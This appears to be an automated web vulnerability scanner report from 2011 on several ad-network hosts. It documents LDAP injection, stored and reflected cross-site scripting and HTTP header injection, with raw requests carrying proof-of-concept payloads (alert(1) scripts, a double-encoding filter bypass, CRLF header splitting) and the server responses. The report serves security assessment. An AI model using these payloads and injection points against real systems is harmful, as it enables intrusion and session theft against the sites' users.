Referer: http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 13:20:59 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 336
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d913132/5/29d3cb5aac4a40a9)!(sn=*/decide.php was not found on this server.</p>
<hr>
<address>Apache/2.2.14 (Ubuntu) Server at amch.questionmarket.com Port 80</address>
</body></html>

2.2. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 1dcd98c84e63efb5)(sn=* and 1dcd98c84e63efb5)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=1dcd98c84e63efb5)(sn=*&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:09:11 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_1dcd98c84e63efb5&#41;&#40;sn=exp=1&initExp=Sat Sep 17 13:09:11 2011&recExp=Sat Sep 17 13:09:11 2011&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:11 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=1dcd98c84e63efb5)!(sn=*&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:09:11 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_1dcd98c84e63efb5&#41;!&#40;sn=exp=1&initExp=Sat Sep 17 13:09:11 2011&recExp=Sat Sep 17 13:09:11 2011&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:11 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

3. Cross-site scripting (stored)  previous  next
There are 2 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ar.voicefive.com/bmx3/broker.pli [n parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the n request parameter submitted to the URL /b/wc_beacon.pli is copied into the HTML document as plain text between tags at the URL /bmx3/broker.pli. The payload d6afa<script>alert(1)</script>1780c77d05c was submitted in the n parameter. This input was returned unmodified in a subsequent request for the URL /bmx3/broker.pli.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /b/wc_beacon.pli?n=d6afa<script>alert(1)</script>1780c77d05c&d=0&v=method-%3E-1,ts-%3E1316264640.321,wait-%3E10000,&1316282687360 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&; BMX_G=method->-1,ts->1316264639; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282

Request 2

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804470 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=A-&TargetID=52980966&AN=2048918403&PG=DLSRD1&ASID=d09c46b378244924a80762d176989e26&destination=;ord=2048918403?
Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:43:12 2011&recExp=Mon Aug 8 01:43:12 2011&prad=314453501&arc=210323079&; UID=187a66e5-80.67.74.153-1312767792; ar_p91143664=exp=24&initExp=Wed Aug 17 18:11:34 2011&recExp=Wed Aug 17 18:13:16 2011&468db16b9200b4026215b7a4=1&prad=309847789&arc=218676900&; ar_p107223597=exp=1&initExp=Thu Sep 1 03:23:36 2011&recExp=Thu Sep 1 03:23:36 2011&prad=74127&arc=452367&; ar_p82806590=exp=1&initExp=Sun Sep 4 14:46:33 2011&recExp=Sun Sep 4 14:46:33 2011&prad=58779256&arc=43578905&; ar_p91136705=exp=1&initExp=Sun Sep 11 12:27:33 2011&recExp=Sun Sep 11 12:27:33 2011&prad=309650252&arc=206710286&

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:43:07 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=30&initExp=Sat Sep 17 14:34:51 2011&recExp=Sat Sep 17 14:43:07 2011&89dd48247dd5113d6472e752=1&prad=65659550&arc=42804470&; expires=Fri 16-Dec-2011 14:43:07 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31988

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804470",Location:C
...[SNIP]...
'exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&', "89dd48246a33298449bdf87": 'method%2D%3E%2D1%2Cts%2D%3E1316267468%2E354%2Cwait%2D%3E10000%2C', "d6afa<script>alert(1)</script>1780c77d05c": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C', "ar_p10888375389dd48245b5da2b0ae9edcea": 'exp=1&initExp=Sat Sep 17 14:04:38 2011&recExp=Sat Sep 17 14:04:38 2011&prad=65659550&ar
...[SNIP]...

3.2. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the pid request parameter submitted to the URL /bmx3/broker.pli is copied into the HTML document as plain text between tags at the URL /bmx3/broker.pli. The payload 711dd%253cscript%253ealert%25281%2529%253c%252fscript%253e92750d4dc16 was submitted in the pid parameter. This input was returned as 711dd<script>alert(1)</script>92750d4dc16 in a subsequent request for the URL /bmx3/broker.pli.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the pid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /bmx3/broker.pli?pid=711dd%253cscript%253ealert%25281%2529%253c%252fscript%253e92750d4dc16&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282

Request 2

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804470 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=A-&TargetID=52980966&AN=2048918403&PG=DLSRD1&ASID=d09c46b378244924a80762d176989e26&destination=;ord=2048918403?
Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:43:12 2011&recExp=Mon Aug 8 01:43:12 2011&prad=314453501&arc=210323079&; UID=187a66e5-80.67.74.153-1312767792; ar_p91143664=exp=24&initExp=Wed Aug 17 18:11:34 2011&recExp=Wed Aug 17 18:13:16 2011&468db16b9200b4026215b7a4=1&prad=309847789&arc=218676900&; ar_p107223597=exp=1&initExp=Thu Sep 1 03:23:36 2011&recExp=Thu Sep 1 03:23:36 2011&prad=74127&arc=452367&; ar_p82806590=exp=1&initExp=Sun Sep 4 14:46:33 2011&recExp=Sun Sep 4 14:46:33 2011&prad=58779256&arc=43578905&; ar_p91136705=exp=1&initExp=Sun Sep 11 12:27:33 2011&recExp=Sun Sep 11 12:27:33 2011&prad=309650252&arc=206710286&

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:43:06 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=28&initExp=Sat Sep 17 14:34:51 2011&recExp=Sat Sep 17 14:43:06 2011&89dd48247dd5113d6472e752=1&prad=65659550&arc=42804470&; expires=Fri 16-Dec-2011 14:43:06 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 31783

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804470",Location:C
...[SNIP]...
=Sat Sep 17 14:42:57 2011&recExp=Sat Sep 17 14:42:57 2011&prad=65659550&arc=42804470&', ">": 'exp=1&initExp=Sat Sep 17 13:09:12 2011&recExp=Sat Sep 17 13:09:12 2011&prad=65659550&arc=42804711&', "ar_711dd<script>alert(1)</script>92750d4dc16": 'exp=1&initExp=Sat Sep 17 14:43:05 2011&recExp=Sat Sep 17 14:43:05 2011&prad=65659550&arc=42804711&', "BMX_3PC": '1', "sn": 'exp=5&initExp=Sat Sep 17 13:09:11 2011&recExp=Sat Sep 17 13:09:12 2011&
...[SNIP]...

4. HTTP header injection  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload e455a%0d%0acb0dcbe7dc2 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /notify?exch=e455a%0d%0acb0dcbe7dc2&id=5aW95q2jLzEvTUEvTkdVM05EbGpOakV0TlRrd1l5MDBNV0l4TFdGaFpEWXRPRGd5WTJKaE9XVmpaakV5LzgxMDc2NjMyOTYwODUyMzI2LzExMjUxMS8xMDc2MzYvMTMvX2ZrTzhjMkc0aHVUREhNaTB2REd4dDlyNU54aUdGUnpISS1paDVLZ3hWSS8/96ahSeC6UElq8Sq4YzZpyNAZwdk HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49CG&cb=19091
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ts=1315103290; optout=1

Response

HTTP/1.1 404 Not found
Date: Sat, 17 Sep 2011 13:29:27 GMT
Server: MMBD/3.5.15.3
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - e455a
cb0dcbe7dc2

x-mm-host: pao-bidder-x7
Connection: keep-alive

Request not found

5. Cross-site scripting (reflected)  previous  next
There are 85 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://amch.questionmarket.com/adscgen/d_layer.php [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/d_layer.php

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca299'%3balert(1)//1e976715b28 was submitted in the lang parameter. This input was echoed as ca299';alert(1)//1e976715b28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=ca299'%3balert(1)//1e976715b28&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:40:46 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b201.dl
Content-Type: text/html
Content-Length: 13935

var DL_HideSelects = true;
var DL_HideObjects = false;
var DL_HideIframes = false;
var DL_Banner; // Will be bound to the DIV element representing the layer
var DL_ScrollState = 0;
var DL_width;
var D
...[SNIP]...
   DL_SurveyClickthru = 1;
}
   DL_Close(false);

window.top.location.href='http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=ca299';alert(1)//1e976715b28&frame=&dl_logo=&invite=no&link='+escape(window.location.href)+'&orig='+escape(window.location.href);
}

function DL_Close(adscout) {
   if (typeof adscout == 'undefined' || adscout == true) {
       DL_Adsco
...[SNIP]...

5.2. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [auto_ctl_invite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the auto_ctl_invite request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32c0c"-alert(1)-"2e42895c328 was submitted in the auto_ctl_invite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=032c0c"-alert(1)-"2e42895c328&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
